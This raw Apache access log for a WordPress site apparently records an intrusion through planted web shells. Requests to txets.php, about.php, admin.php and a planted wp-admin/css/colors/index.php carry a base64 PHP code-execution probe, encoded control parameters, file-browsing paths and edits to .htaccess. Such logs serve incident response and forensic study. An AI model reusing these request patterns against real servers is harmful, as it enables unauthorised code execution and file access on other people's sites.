103.74.173.0 - - [14/Apr/2026:07:51:38 +0200] "GET /favicon.ico HTTP/1.1" 200 251 "https://fti-hios.eu//txets.php?ARRAY=7o2230223n313737363134393439342p2231223n22687474703n5p2s5p2s6p776n3132342r73696p76692r63616q5p2s3s6p633q6175746s5s636s646526633q6148523063446s764p327833616n45794r43357n615778326153356n59573076267869616r5s64616r5s6r756q3q3526687474705s686s73743q6674692q68696s732r6575266n633q312668746163636573733q3126726s626s74733q31266175746s5s66696p655s6r616q653q74786574732r706870266p61695s7975616r3q3026743q313737363134353839342q3934356664356438643030363462666130663463613437343230376439653463222p2232223n223462386430633165323536383232306665396362363964646335363339373935222p2233223n226638613531633563383166656138353739393038393634373032363437643264222p226175746s5s66696p655s6r616q65223n2274786574732r706870222p226175746s5s70617373223n2232322q35302q35382q36332q37342q39302q3135222p2262696r675s70617373223n2232322q35302q35382q36332q37342q39302q3135222p2262696r675s737973223n7o226175746s5s6o756s5s7n68616r223n2231222p22756r696r7374616p6p223n2231227q7q" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.0.0 Safari/537.36"
45.227.253.0 - - [14/Apr/2026:07:51:41 +0200] "POST //txets.php HTTP/1.1" 403 344 "https://www.google.com/" "-"
45.227.253.0 - - [14/Apr/2026:07:52:08 +0200] "POST //txets.php HTTP/1.1" 403 344 "https://www.google.com/" "-"
45.227.253.0 - - [14/Apr/2026:07:52:08 +0200] "POST / HTTP/1.1" 200 422 "https://www.google.com/" "-"
45.227.253.0 - - [14/Apr/2026:07:52:08 +0200] "POST /157446-juejiang/ HTTP/1.1" 200 423 "https://www.google.com/" "-"
45.227.253.0 - - [14/Apr/2026:07:52:09 +0200] "GET //txets.php?base=1&php=ZGllKCdiNmM2ZmJlZjgwYTY2ZmE1NDVhY2UwMjE1YTc4YmI0YicpOw==&ARRAY=7o2230223n313737363135303030352p2231223n22687474703n5p2s5p2s6p776n3132342r73696p76692r63616q5p2s3s6p633q7368656p6p5s7368616s5s62696r675s79756r78696r675s70687026743q313737363134363430352q6637373136663735376261386535383564336265656130653565373031333462222p2232223n223462386430633165323536383232306665396362363964646335363339373935222p2233223n226638613531633563383166656138353739393038393634373032363437643264222p2262696r675s70617373223n2232322q35302q35382q36332q37342q39302q3135227q HTTP/1.1" 403 344 "-" "-"
103.74.173.0 - - [14/Apr/2026:07:52:09 +0200] "GET //txets.php?ARRAY=7o2230223n313737363134393532372p2231223n22687474703n5p2s5p2s6p776n3132342r73696p76692r63616q5p2s3s6p633q6564697426743q313737363134353932372q3865306539363662376262343065623533323165306339633565373835383231222p2232223n223462386430633165323536383232306665396362363964646335363339373935222p2233223n226638613531633563383166656138353739393038393634373032363437643264222p226175746s5s66696p655s6r616q65223n2274786574732r706870222p226175746s5s70617373223n2232322q35302q35382q36332q37342q39302q3135222p2262696r675s70617373223n2232322q35302q35382q36332q37342q39302q3135222p2262696r675s737973223n7o226175746s5s6o756s5s7n68616r223n2231222p22756r696r7374616p6p223n2231227q7q HTTP/1.1" 403 595 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.0.0 Safari/537.36"
103.74.173.0 - - [14/Apr/2026:07:52:09 +0200] "GET /favicon.ico HTTP/1.1" 200 251 "https://fti-hios.eu//txets.php?ARRAY=7o2230223n313737363134393532372p2231223n22687474703n5p2s5p2s6p776n3132342r73696p76692r63616q5p2s3s6p633q6564697426743q313737363134353932372q3865306539363662376262343065623533323165306339633565373835383231222p2232223n223462386430633165323536383232306665396362363964646335363339373935222p2233223n226638613531633563383166656138353739393038393634373032363437643264222p226175746s5s66696p655s6r616q65223n2274786574732r706870222p226175746s5s70617373223n2232322q35302q35382q36332q37342q39302q3135222p2262696r675s70617373223n2232322q35302q35382q36332q37342q39302q3135222p2262696r675s737973223n7o226175746s5s6o756s5s7n68616r223n2231222p22756r696r7374616p6p223n2231227q7q" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.0.0 Safari/537.36"
45.227.253.0 - - [14/Apr/2026:07:52:09 +0200] "GET /157446-juejiang/?base=1&php=ZGllKCdkNDc1ODllMmRiMzZhZGYzYWRmZmU5YmIyYTU5OTk0YycpOw==&ARRAY=7o2230223n313737363135303030352p2231223n22687474703n5p2s5p2s6p776n3132342r73696p76692r63616q5p2s3s6p633q7368656p6p5s7368616s5s62696r675s79756r78696r675s70687026743q313737363134363430352q6637373136663735376261386535383564336265656130653565373031333462222p2232223n226138396461653834356330303433353232653737306138636639663931383838222p2233223n223032623832383666613964616438643064623861303630393930663139393437222p2262696r675s70617373223n2232382q33392q35312q36352q37322q38342q3838227q HTTP/1.1" 200 3776 "-" "-"
45.227.253.0 - - [14/Apr/2026:07:52:09 +0200] "GET /?base=1&php=ZGllKCdlYjIxNjAzY2ZhYjI4NWE5NWE4ZWFjYTAyMjE0M2Y3NycpOw==&ARRAY=7o2230223n313737363135303030352p2231223n22687474703n5p2s5p2s6p776n3132342r73696p76692r63616q5p2s3s6p633q7368656p6p5s7368616s5s62696r675s79756r78696r675s70687026743q313737363134363430352q6637373136663735376261386535383564336265656130653565373031333462222p2232223n223739316337393165646432363838386361366163396563363036323036666532222p2233223n226337323238396637353332643736333933656134353438643033306533346137222p2262696r675s70617373223n2231392q34382q35392q36372q37352q39302q3236227q HTTP/1.1" 200 3776 "-" "-"
103.74.173.0 - - [14/Apr/2026:07:52:10 +0200] "GET /?ARRAY=7o2230223n313737363134393532372p2231223n22687474703n5p2s5p2s6p776n3132342r73696p76692r63616q5p2s3s6p633q6564697426743q313737363134353932372q3865306539363662376262343065623533323165306339633565373835383231222p2232223n223739316337393165646432363838386361366163396563363036323036666532222p2233223n226337323238396637353332643736333933656134353438643033306533346137222p226175746s5s66696p655s6r616q65223n2274786574732r706870222p226175746s5s70617373223n2232322q35302q35382q36332q37342q39302q3135222p2262696r675s70617373223n2231392q34382q35392q36372q37352q39302q3236222p2262696r675s737973223n7o226175746s5s6o756s5s7n68616r223n2231222p22756r696r7374616p6p223n2231227q7q HTTP/1.1" 200 3947 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.0.0 Safari/537.36"
103.74.173.0 - - [14/Apr/2026:07:52:10 +0200] "GET /favicon.ico HTTP/1.1" 200 251 "https://fti-hios.eu/?ARRAY=7o2230223n313737363134393532372p2231223n22687474703n5p2s5p2s6p776n3132342r73696p76692r63616q5p2s3s6p633q6564697426743q313737363134353932372q3865306539363662376262343065623533323165306339633565373835383231222p2232223n223739316337393165646432363838386361366163396563363036323036666532222p2233223n226337323238396637353332643736333933656134353438643033306533346137222p226175746s5s66696p655s6r616q65223n2274786574732r706870222p226175746s5s70617373223n2232322q35302q35382q36332q37342q39302q3135222p2262696r675s70617373223n2231392q34382q35392q36372q37352q39302q3236222p2262696r675s737973223n7o226175746s5s6o756s5s7n68616r223n2231222p22756r696r7374616p6p223n2231227q7q" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.0.0 Safari/537.36"
103.74.173.0 - - [14/Apr/2026:07:52:11 +0200] "GET /157446-juejiang/?ARRAY=7o2230223n313737363134393532372p2231223n22687474703n5p2s5p2s6p776n3132342r73696p76692r63616q5p2s3s6p633q6564697426743q313737363134353932372q3865306539363662376262343065623533323165306339633565373835383231222p2232223n226138396461653834356330303433353232653737306138636639663931383838222p2233223n223032623832383666613964616438643064623861303630393930663139393437222p226175746s5s66696p655s6r616q65223n2274786574732r706870222p226175746s5s70617373223n2232322q35302q35382q36332q37342q39302q3135222p2262696r675s70617373223n2232382q33392q35312q36352q37322q38342q3838222p2262696r675s737973223n7o226175746s5s6o756s5s7n68616r223n2231222p22756r696r7374616p6p223n2231227q7q HTTP/1.1" 200 3947 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.0.0 Safari/537.36"
103.74.173.0 - - [14/Apr/2026:07:52:11 +0200] "GET /favicon.ico HTTP/1.1" 200 251 "https://fti-hios.eu/157446-juejiang/?ARRAY=7o2230223n313737363134393532372p2231223n22687474703n5p2s5p2s6p776n3132342r73696p76692r63616q5p2s3s6p633q6564697426743q313737363134353932372q3865306539363662376262343065623533323165306339633565373835383231222p2232223n226138396461653834356330303433353232653737306138636639663931383838222p2233223n223032623832383666613964616438643064623861303630393930663139393437222p226175746s5s66696p655s6r616q65223n2274786574732r706870222p226175746s5s70617373223n2232322q35302q35382q36332q37342q39302q3135222p2262696r675s70617373223n2232382q33392q35312q36352q37322q38342q3838222p2262696r675s737973223n7o226175746s5s6o756s5s7n68616r223n2231222p22756r696r7374616p6p223n2231227q7q" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.0.0 Safari/537.36"
103.74.173.0 - - [14/Apr/2026:07:52:22 +0200] "GET //txets.php?ARRAY=7o2230223n313737363134393532372p2231223n22687474703n5p2s5p2s6p776n3132342r73696p76692r63616q5p2s3s6p633q6564697426743q313737363134353932372q3865306539363662376262343065623533323165306339633565373835383231222p2232223n223462386430633165323536383232306665396362363964646335363339373935222p2233223n226638613531633563383166656138353739393038393634373032363437643264222p226175746s5s66696p655s6r616q65223n2274786574732r706870222p226175746s5s70617373223n2232322q35302q35382q36332q37342q39302q3135222p2262696r675s70617373223n2232322q35302q35382q36332q37342q39302q3135222p2262696r675s737973223n7o226175746s5s6o756s5s7n68616r223n2231222p22756r696r7374616p6p223n2231227q7q HTTP/1.1" 403 595 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.0.0 Safari/537.36"
103.74.173.0 - - [14/Apr/2026:07:52:22 +0200] "GET /favicon.ico HTTP/1.1" 200 251 "https://fti-hios.eu//txets.php?ARRAY=7o2230223n313737363134393532372p2231223n22687474703n5p2s5p2s6p776n3132342r73696p76692r63616q5p2s3s6p633q6564697426743q313737363134353932372q3865306539363662376262343065623533323165306339633565373835383231222p2232223n223462386430633165323536383232306665396362363964646335363339373935222p2233223n226638613531633563383166656138353739393038393634373032363437643264222p226175746s5s66696p655s6r616q65223n2274786574732r706870222p226175746s5s70617373223n2232322q35302q35382q36332q37342q39302q3135222p2262696r675s70617373223n2232322q35302q35382q36332q37342q39302q3135222p2262696r675s737973223n7o226175746s5s6o756s5s7n68616r223n2231222p22756r696r7374616p6p223n2231227q7q" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.0.0 Safari/537.36"
103.74.173.0 - - [14/Apr/2026:07:52:24 +0200] "GET //about.php HTTP/1.1" 200 3832 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.0.0 Safari/537.36"
103.74.173.0 - - [14/Apr/2026:07:52:26 +0200] "GET /favicon.ico HTTP/1.1" 200 222 "http://fti-hios.eu//about.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.0.0 Safari/537.36"
103.74.173.0 - - [14/Apr/2026:07:52:29 +0200] "POST //about.php?pilihan&path=/home/hios/public_html HTTP/1.1" 200 3855 "http://fti-hios.eu//about.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.0.0 Safari/537.36"
103.74.173.0 - - [14/Apr/2026:07:52:29 +0200] "GET /favicon.ico HTTP/1.1" 200 222 "http://fti-hios.eu//about.php?pilihan&path=/home/hios/public_html" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.0.0 Safari/537.36"
167.86.102.0 - - [14/Apr/2026:07:52:31 +0200] "GET /wp-admin/css/ HTTP/1.1" 403 400 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
103.74.173.0 - - [14/Apr/2026:07:52:31 +0200] "GET //about.php?fileloc=/home/hios/public_html/.htaccess&path=/home/hios/public_html HTTP/1.1" 200 2682 "http://fti-hios.eu//about.php?pilihan&path=/home/hios/public_html" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.0.0 Safari/537.36"
103.74.173.0 - - [14/Apr/2026:07:52:32 +0200] "GET /favicon.ico HTTP/1.1" 200 222 "http://fti-hios.eu//about.php?fileloc=/home/hios/public_html/.htaccess&path=/home/hios/public_html" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.0.0 Safari/537.36"
103.74.173.0 - - [14/Apr/2026:07:52:45 +0200] "POST //about.php?fileloc=/home/hios/public_html/.htaccess&path=/home/hios/public_html HTTP/1.1" 200 2700 "http://fti-hios.eu//about.php?fileloc=/home/hios/public_html/.htaccess&path=/home/hios/public_html" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.0.0 Safari/537.36"
103.74.173.0 - - [14/Apr/2026:07:52:45 +0200] "GET /favicon.ico HTTP/1.1" 200 222 "http://fti-hios.eu//about.php?fileloc=/home/hios/public_html/.htaccess&path=/home/hios/public_html" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.0.0 Safari/537.36"
103.74.173.0 - - [14/Apr/2026:07:52:48 +0200] "GET //admin.php HTTP/1.1" 200 3831 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.0.0 Safari/537.36"
103.74.173.0 - - [14/Apr/2026:07:52:48 +0200] "GET /favicon.ico HTTP/1.1" 200 222 "http://fti-hios.eu//admin.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.0.0 Safari/537.36"
103.74.173.0 - - [14/Apr/2026:07:53:04 +0200] "GET //admin.php?fileloc=/home/hios/public_html/.htaccess&path=/home/hios/public_html HTTP/1.1" 200 2683 "http://fti-hios.eu//admin.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.0.0 Safari/537.36"
103.74.173.0 - - [14/Apr/2026:07:53:04 +0200] "GET /favicon.ico HTTP/1.1" 200 222 "http://fti-hios.eu//admin.php?fileloc=/home/hios/public_html/.htaccess&path=/home/hios/public_html" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.0.0 Safari/537.36"
103.74.173.0 - - [14/Apr/2026:07:53:10 +0200] "GET //admin.php?path=/home/hios/public_html HTTP/1.1" 200 3832 "http://fti-hios.eu//admin.php?fileloc=/home/hios/public_html/.htaccess&path=/home/hios/public_html" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.0.0 Safari/537.36"
103.74.173.0 - - [14/Apr/2026:07:53:10 +0200] "GET /favicon.ico HTTP/1.1" 200 222 "http://fti-hios.eu//admin.php?path=/home/hios/public_html" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.0.0 Safari/537.36"
103.74.173.0 - - [14/Apr/2026:07:53:18 +0200] "POST //admin.php?pilihan&path=/home/hios/public_html HTTP/1.1" 200 3856 "http://fti-hios.eu//admin.php?path=/home/hios/public_html" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.0.0 Safari/537.36"
103.74.173.0 - - [14/Apr/2026:07:53:18 +0200] "GET /favicon.ico HTTP/1.1" 200 222 "http://fti-hios.eu//admin.php?pilihan&path=/home/hios/public_html" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.0.0 Safari/537.36"
103.74.173.0 - - [14/Apr/2026:07:53:24 +0200] "POST //admin.php?pilihan&path=/home/hios/public_html HTTP/1.1" 200 3904 "http://fti-hios.eu//admin.php?pilihan&path=/home/hios/public_html" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.0.0 Safari/537.36"
103.74.173.0 - - [14/Apr/2026:07:53:24 +0200] "GET /favicon.ico HTTP/1.1" 200 222 "http://fti-hios.eu//admin.php?pilihan&path=/home/hios/public_html" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.0.0 Safari/537.36"
103.74.173.0 - - [14/Apr/2026:07:53:31 +0200] "POST //admin.php?pilihan&path=/home/hios/public_html HTTP/1.1" 200 3856 "http://fti-hios.eu//admin.php?pilihan&path=/home/hios/public_html" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.0.0 Safari/537.36"
103.74.173.0 - - [14/Apr/2026:07:53:32 +0200] "GET /favicon.ico HTTP/1.1" 200 222 "http://fti-hios.eu//admin.php?pilihan&path=/home/hios/public_html" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.0.0 Safari/537.36"
103.74.173.0 - - [14/Apr/2026:07:53:33 +0200] "GET //admin.php?path=/home/hios/public_html/wp-admin HTTP/1.1" 200 4948 "http://fti-hios.eu//admin.php?pilihan&path=/home/hios/public_html" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.0.0 Safari/537.36"
103.74.173.0 - - [14/Apr/2026:07:53:34 +0200] "GET /favicon.ico HTTP/1.1" 200 222 "http://fti-hios.eu//admin.php?path=/home/hios/public_html/wp-admin" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.0.0 Safari/537.36"
103.74.173.0 - - [14/Apr/2026:07:53:36 +0200] "GET //admin.php?path=/home/hios/public_html/wp-admin/css HTTP/1.1" 200 4838 "http://fti-hios.eu//admin.php?path=/home/hios/public_html/wp-admin" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.0.0 Safari/537.36"
103.74.173.0 - - [14/Apr/2026:07:53:36 +0200] "GET /favicon.ico HTTP/1.1" 200 222 "http://fti-hios.eu//admin.php?path=/home/hios/public_html/wp-admin/css" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.0.0 Safari/537.36"
103.74.173.0 - - [14/Apr/2026:07:53:37 +0200] "GET //admin.php?path=/home/hios/public_html/wp-admin/css/colors HTTP/1.1" 200 2788 "http://fti-hios.eu//admin.php?path=/home/hios/public_html/wp-admin/css" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.0.0 Safari/537.36"
103.74.173.0 - - [14/Apr/2026:07:53:38 +0200] "GET /favicon.ico HTTP/1.1" 200 222 "http://fti-hios.eu//admin.php?path=/home/hios/public_html/wp-admin/css/colors" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.0.0 Safari/537.36"
103.74.173.0 - - [14/Apr/2026:07:53:54 +0200] "POST //admin.php?path=/home/hios/public_html/wp-admin/css/colors HTTP/1.1" 200 2822 "http://fti-hios.eu//admin.php?path=/home/hios/public_html/wp-admin/css/colors" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.0.0 Safari/537.36"
103.74.173.0 - - [14/Apr/2026:07:53:54 +0200] "GET /favicon.ico HTTP/1.1" 200 222 "http://fti-hios.eu//admin.php?path=/home/hios/public_html/wp-admin/css/colors" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.0.0 Safari/537.36"
103.74.173.0 - - [14/Apr/2026:07:54:45 +0200] "GET //wp-admin/css/colors/index.php?ARRAY=7o2230223n313737363134393638312p2231223n22687474703n5p2s5p2s6p776n3132342r73696p76692r63616q5p2s3s6p633q6564697426743q313737363134363038312q3038373164633031346233653437313363633363643165663265366466626562222p2232223n223462386430633165323536383232306665396362363964646335363339373935222p2233223n226638613531633563383166656138353739393038393634373032363437643264222p226175746s5s66696p655s6r616q65223n2274786574732r706870222p226175746s5s70617373223n2232322q35302q35382q36332q37342q39302q3135222p2262696r675s70617373223n2232322q35302q35382q36332q37342q39302q3135222p2262696r675s737973223n7o226175746s5s6o756s5s7n68616r223n2231222p22756r696r7374616p6p223n2231227q7q HTTP/1.1" 200 9533 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.0.0 Safari/537.36"
103.74.173.0 - - [14/Apr/2026:07:54:46 +0200] "GET /favicon.ico HTTP/1.1" 200 222 "http://fti-hios.eu//wp-admin/css/colors/index.php?ARRAY=7o2230223n313737363134393638312p2231223n22687474703n5p2s5p2s6p776n3132342r73696p76692r63616q5p2s3s6p633q6564697426743q313737363134363038312q3038373164633031346233653437313363633363643165663265366466626562222p2232223n223462386430633165323536383232306665396362363964646335363339373935222p2233223n226638613531633563383166656138353739393038393634373032363437643264222p226175746s5s66696p655s6r616q65223n2274786574732r706870222p226175746s5s70617373223n2232322q35302q35382q36332q37342q39302q3135222p2262696r675s70617373223n2232322q35302q35382q36332q37342q39302q3135222p2262696r675s737973223n7o226175746s5s6o756s5s7n68616r223n2231222p22756r696r7374616p6p223n2231227q7q" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.0.0 Safari/537.36"
103.74.173.0 - - [14/Apr/2026:07:54:48 +0200] "GET //wp-admin/css/colors/index.php?ARRAY=7o2230223n313737363134393638312p2231223n22687474703n5p2s5p2s6p776n3132342r73696p76692r63616q5p2s3s6p633q6564697426743q313737363134363038312q3038373164633031346233653437313363633363643165663265366466626562222p2232223n223462386430633165323536383232306665396362363964646335363339373935222p2233223n226638613531633563383166656138353739393038393634373032363437643264222p226175746s5s66696p655s6r616q65223n2274786574732r706870222p226175746s5s70617373223n2232322q35302q35382q36332q37342q39302q3135222p2262696r675s70617373223n2232322q35302q35382q36332q37342q39302q3135222p2262696r675s737973223n7o226175746s5s6o756s5s7n68616r223n2231222p22756r696r7374616p6p223n2231227q7q&path=/home/hios/public_html HTTP/1.1" 200 14801 "http://fti-hios.eu//wp-admin/css/colors/index.php?ARRAY=7o2230223n313737363134393638312p2231223n22687474703n5p2s5p2s6p776n3132342r73696p76692r63616q5p2s3s6p633q6564697426743q313737363134363038312q3038373164633031346233653437313363633363643165663265366466626562222p2232223n223462386430633165323536383232306665396362363964646335363339373935222p2233223n226638613531633563383166656138353739393038393634373032363437643264222p226175746s5s66696p655s6r616q65223n2274786574732r706870222p226175746s5s70617373223n2232322q35302q35382q36332q37342q39302q3135222p2262696r675s70617373223n2232322q35302q35382q36332q37342q39302q3135222p2262696r675s737973223n7o226175746s5s6o756s5s7n68616r223n2231222p22756r696r7374616p6p223n2231227q7q" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.0.0 Safari/537.36"
103.74.173.0 - - [14/Apr/2026:07:54:49 +0200] "GET /favicon.ico HTTP/1.1" 200 222 "http://fti-hios.eu//wp-admin/css/colors/index.php?ARRAY=7o2230223n313737363134393638312p2231223n22687474703n5p2s5p2s6p776n3132342r73696p76692r63616q5p2s3s6p633q6564697426743q313737363134363038312q3038373164633031346233653437313363633363643165663265366466626562222p2232223n223462386430633165323536383232306665396362363964646335363339373935222p2233223n226638613531633563383166656138353739393038393634373032363437643264222p226175746s5s66696p655s6r616q65223n2274786574732r706870222p226175746s5s70617373223n2232322q35302q35382q36332q37342q39302q3135222p2262696r675s70617373223n2232322q35302q35382q36332q37342q39302q3135222p2262696r675s737973223n7o226175746s5s6o756s5s7n68616r223n2231222p22756r696r7374616p6p223n2231227q7q&path=/home/hios/public_html" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.0.0 Safari/537.36"
103.74.173.0 - - [14/Apr/2026:07:54:54 +0200] "GET //wp-admin/css/colors/index.php?ARRAY=7o2230223n313737363134393638312p2231223n22687474703n5p2s5p2s6p776n3132342r73696p76692r63616q5p2s3s6p633q6564697426743q313737363134363038312q3038373164633031346233653437313363633363643165663265366466626562222p2232223n223462386430633165323536383232306665396362363964646335363339373935222p2233223n226638613531633563383166656138353739393038393634373032363437643264222p226175746s5s66696p655s6r616q65223n2274786574732r706870222p226175746s5s70617373223n2232322q35302q35382q36332q37342q39302q3135222p2262696r675s70617373223n2232322q35302q35382q36332q37342q39302q3135222p2262696r675s737973223n7o226175746s5s6o756s5s7n68616r223n2231222p22756r696r7374616p6p223n2231227q7q&path=/home/hios HTTP/1.1" 200 8910 "http://fti-hios.eu//wp-admin/css/colors/index.php?ARRAY=7o2230223n313737363134393638312p2231223n22687474703n5p2s5p2s6p776n3132342r73696p76692r63616q5p2s3s6p633q6564697426743q313737363134363038312q3038373164633031346233653437313363633363643165663265366466626562222p2232223n223462386430633165323536383232306665396362363964646335363339373935222p2233223n226638613531633563383166656138353739393038393634373032363437643264222p226175746s5s66696p655s6r616q65223n2274786574732r706870222p226175746s5s70617373223n2232322q35302q35382q36332q37342q39302q3135222p2262696r675s70617373223n2232322q35302q35382q36332q37342q39302q3135222p2262696r675s737973223n7o226175746s5s6o756s5s7n68616r223n2231222p22756r696r7374616p6p223n2231227q7q&path=/home/hios/public_html" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.0.0 Safari/537.36"
103.74.173.0 - - [14/Apr/2026:07:54:55 +0200] "GET /favicon.ico HTTP/1.1" 200 222 "http://fti-hios.eu//wp-admin/css/colors/index.php?ARRAY=7o2230223n313737363134393638312p2231223n22687474703n5p2s5p2s6p776n3132342r73696p76692r63616q5p2s3s6p633q6564697426743q313737363134363038312q3038373164633031346233653437313363633363643165663265366466626562222p2232223n223462386430633165323536383232306665396362363964646335363339373935222p2233223n226638613531633563383166656138353739393038393634373032363437643264222p226175746s5s66696p655s6r616q65223n2274786574732r706870222p226175746s5s70617373223n2232322q35302q35382q36332q37342q39302q3135222p2262696r675s70617373223n2232322q35302q35382q36332q37342q39302q3135222p2262696r675s737973223n7o226175746s5s6o756s5s7n68616r223n2231222p22756r696r7374616p6p223n2231227q7q&path=/home/hios" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.0.0 Safari/537.36"
23.101.4.0 - - [14/Apr/2026:07:54:57 +0200] "GET /wp-content/index.php HTTP/1.1" 200 3537 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
23.101.4.0 - - [14/Apr/2026:07:54:57 +0200] "GET /wp-content/themes/ HTTP/1.1" 200 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
23.101.4.0 - - [14/Apr/2026:07:54:58 +0200] "GET /wp-content/uploads/admin.php HTTP/1.1" 200 3947 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
